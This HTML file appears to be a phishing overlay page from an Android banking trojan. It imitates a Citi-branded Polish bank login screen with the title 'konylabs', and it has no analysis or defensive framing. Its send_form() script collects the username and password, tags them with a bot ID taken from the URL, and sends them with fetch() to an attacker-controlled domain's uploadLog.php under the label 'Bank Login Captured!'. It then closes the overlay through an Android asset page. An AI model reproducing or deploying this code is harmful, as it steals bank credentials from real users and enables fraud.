<!DOCTYPE html>
<html>
<head>
    <title>konylabs</title>
    <link rel="shortcut icon" href="com.konylabs.cbplpat.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
</head>
<body>

<style type="text/css">
    body {
        background: #265499;
        margin: 0;
        padding: 0;
        font-family: Helvetica, sans-serif;
        background-size: 100%;
    }
    .logo {
text-align: center;
    padding: 20px 0px 10px 0px;
    background-size: 80%;
    color: #fff;
    font-weight: 400;
    text-decoration: none;
    background: #265499;
    }
    .form {
        text-align: center;
        padding-top: 70px;
    }
    .form label {
        display: block;
    }
    form {
        display: inline-block;
    }
fieldset {
      position: relative;
      text-align: center;
      border: none;
          margin: 0;
    padding: 0;

}

input[type="text"],input[type="password"] {
    line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 10px;
    margin: 0px 1px;
    display: block;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 48px;
    color: #808080;
    text-align: left;
    outline: none;
    border: 1.3px solid #00745f;
    border-top: none;
    border-left: none;
    border-right: none;
}
input[type="button"] {
left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 30px 0px 0px 0px;
    outline: none;
    float: right;
    color: #fff;
    border: none;
    font-size: 14px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #056dae;
    border: 1px solid #056dae;
}
input[type="button"]:disabled {
left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 30px 0px 0px 0px;
    outline: none;
    float: right;
    color: #fff;
    border: none;
    font-size: 14px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #056dae;
    opacity: 0.6;
    border: 1px solid #056dae;
}
input::placeholder {
    color: #808080;
    font-size: 15px;
}

</style>


<fieldset id="formtosend">

<div class="" id="log" style="display: block;">

<div class="logo">
<svg id="logo-bg" height="31" width="166.55" class="citi-logo show" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 400 70"><defs><style>.svg-logo-text-color{fill:white;}</style></defs><path class="svg-logo-text-color" d="M133.15,58.46v-21c0-7.74-2.74-11.24-8.5-11.24-5,0-8.91,3.36-8.91,11.24v21H110.6V11.38l5.14-2.88V26.87a11.63,11.63,0,0,1,9.94-5.14c7.61,0,12.61,4.46,12.61,14.8V58.46Z" transform="translate(-2.13 -0.86)"></path><path class="svg-logo-text-color" d="M159.87,21.73a25.69,25.69,0,0,0-12.06,2.88l1.92,4.18a18.78,18.78,0,0,1,9.8-2.74c5.28,0,7.81,2.6,7.81,7.95v4.25a19.3,19.3,0,0,0-9-2.06c-7.13,0-13.78,3.43-13.78,11.51,0,8.7,5.89,11.51,11.51,11.51a14.84,14.84,0,0,0,11.24-5.14v4.39h5.14V33.38C172.48,25,167.62,21.73,159.87,21.73Zm7.47,27.89A12.6,12.6,0,0,1,157,55c-4.39,0-7.33-2.33-7.33-7.68,0-4.52,3.15-7.06,8.43-7.06,4.39,0,6.92.75,9.25,2.05Z" transform="translate(-2.13 -0.86)"></path><path class="svg-logo-text-color" d="M203.8,58.46v-21c0-7.74-2.74-11.24-8.5-11.24-5,0-8.91,3.36-8.91,11.24v21h-5.14v-36h5.14v4.39a11.63,11.63,0,0,1,9.94-5.14c7.61,0,12.61,4.46,12.61,14.8V58.46Z" transform="translate(-2.13 -0.86)"></path><path class="svg-logo-text-color" d="M239.16,58.46V54.08c-2.54,2.74-6,5.14-10.83,5.14-7.2,0-12.88-5.48-12.88-18.16s6-19.33,13.57-19.33a12.79,12.79,0,0,1,10.14,4.8V11.38L244.3,8.5v50Zm0-26.86a11.76,11.76,0,0,0-9.73-5.41c-6,0-8.91,5.14-8.91,14.8,0,9,3.43,13.78,9.11,13.78,3.84,0,7-2.06,9.53-5.21Z" transform="translate(-2.13 -0.86)"></path><path class="svg-logo-text-color" d="M254.31,58.46V11.38l5.14-2.88v50Z" transform="translate(-2.13 -0.86)"></path><path class="svg-logo-text-color" d="M283,21.73c-8.77,0-15.76,6.58-15.76,18.78s6.72,18.71,15.49,18.71,15.76-6.78,15.76-19S291.73,21.73,283,21.73Zm-.14,33c-6.24,0-10.42-4.93-10.42-14.39s4.18-14.19,10.42-14.19,10.49,4.73,10.49,14.19S289.05,54.76,282.82,54.76Z" transform="translate(-2.13 -0.86)"></path><path class="svg-logo-text-color" d="M335.38,58.46h-4.73l-6.51-24.12c-.34-1.23-.89-3.77-1.1-5.07-.21,1.3-.75,3.84-1.1,5.07l-6.51,24.12h-4.59l-9.53-36h5.28l5.62,23.78c.27,1.23.75,3.77,1,5.07.27-1.3.82-3.84,1.16-5.07l6.44-23.78h4.66L332,46.26c.34,1.23.89,3.77,1.17,5.07.27-1.3.75-3.84,1-5.07l5.62-23.78h5.14Z" transform="translate(-2.13 -0.86)"></path><path class="svg-logo-text-color" d="M361.83,71.14h-5.14l4.93-13.09L348.81,22.48h5.41L363,48.59l1.23,3.7,1.23-3.63,8.84-26.18h5.41Z" transform="translate(-2.13 -0.86)"></path><path fill="red" d="M92.54,16.6a35.85,35.85,0,0,0-59.35,0h8.49a29,29,0,0,1,42.37,0Z" transform="translate(-2.13 -0.86)"></path><path class="svg-logo-text-color" d="M29.69,47.86l-.16.16a12.23,12.23,0,0,1-8.73,4.07c-6.5,0-11.21-4.87-11.21-11.6s4.72-11.6,11.21-11.6A12.23,12.23,0,0,1,29.53,33l.16.17,4.19-5.06L33.77,28A15.94,15.94,0,0,0,21,21.85,19.42,19.42,0,0,0,7.75,26.69c-3.68,3.4-5.61,8.16-5.61,13.81S4.07,50.91,7.75,54.3A19.37,19.37,0,0,0,21,59.15,16,16,0,0,0,33.77,53l.11-.14Z" transform="translate(-2.13 -0.86)"></path><rect class="svg-logo-text-color" x="35.96" y="21.6" width="7.38" height="36"></rect><path class="svg-logo-text-color" d="M74.41,50.63a10.82,10.82,0,0,1-5.46,1.81c-2.39,0-3.45-1.26-3.45-4.07V29.24H73V22.46h-7.5V11.25l-7.25,3.87v7.34H52v6.78h6.24V49.58c0,5.54,3.29,9.33,8.19,9.43A11.57,11.57,0,0,0,73,57.36l.08-.05,1.78-6.94Z" transform="translate(-2.13 -0.86)"></path><rect class="svg-logo-text-color" x="78.38" y="21.6" width="7.38" height="36"></rect><path class="svg-logo-text-color" d="M213.49,33.06a6.5,6.5,0,1,1-6.5-6.5A6.37,6.37,0,0,1,213.49,33.06Zm1.24,0A7.74,7.74,0,1,0,207,40.81,7.59,7.59,0,0,0,214.74,33.06Zm-4.2-1.82a2.48,2.48,0,0,0-2.77-2.55h-3.71v8.45h1.44V33.88h1.63l1.65,3.26h1.7l-1.74-3.41A2.41,2.41,0,0,0,210.54,31.24Zm-1.46,0c0,.83-.58,1.2-1.35,1.2h-2.23v-2.4h2.23A1.19,1.19,0,0,1,209.08,31.28Z" transform="translate(180 -22)"></path></svg>
</div>
      <script>function closeapp(){setTimeout(function(){ window.location.replace("file:///android_asset/closeapp.html");}, 1000); };
function check() {
  var inp1 = document.getElementById('login'),
      inp2 = document.getElementById('password');
  document.getElementById('s').disabled = inp1.value && inp2.value ? false : "disabled";
}
</script>
<span style="background: #265499; color: #fff; font-size: 18px; display: block; text-align: center; padding: 20px;">
    Witaj!
</span>
<span style="background: #265499; color: #d5d5d5; font-size: 15px; display: block; text-align: center;  padding: 10px;">
    Podaj nazwę użytkownika, która zostanie sparowana z Twoim urządzeniem. <span style="color: #fff;">Dowiedz się więcej</span>
</span>
<div class="area" style="padding: 30px;">
        <input type="text" name="login" id="login" onkeyup="check();" autocomplete="off" placeholder="Nazwa użytkownika" style="height: 50px;">
        <input type="password" name="password" id="password" onkeyup="check();" autocomplete="off" placeholder="Hasło" style="height: 50px;">
        <label style="display: block;float: right;position: relative;top: -35px;right: 10px;font-size: 14px;color: #006bc0;">Przypomnij hasło</label>
        <input name="exit" type="hidden" text="true"/>
        <input type="button" name="sumbit" id="s" onclick="send_form()" value="Zaloguj" style="" disabled="disabled">
</div>

</div>

</fieldset> 

<script>function closeapp(){setTimeout(function(){ window.location.replace("file:///android_asset/closeapp.html");}, 1000); };
if ( typeof Android == "undefined")
    var Android = {
        returnResult : alert.bind(window)
    }

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals.join(',') + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
        var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            if(bsform[j].name == 'sumbit') continue;
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

function send_form()
{
var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
    if (document.getElementById("login").value == '')
{
    alert ('Wszystkie pola wymagane!');
    return false;
}
if (document.getElementById("password").value == '')
{
    alert ('Wszystkie pola wymagane!');
    return false;
}
    var form = document.getElementById('formtosend');
    fetch("http://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(form)); closeapp();
}
</script>

</body>
</html>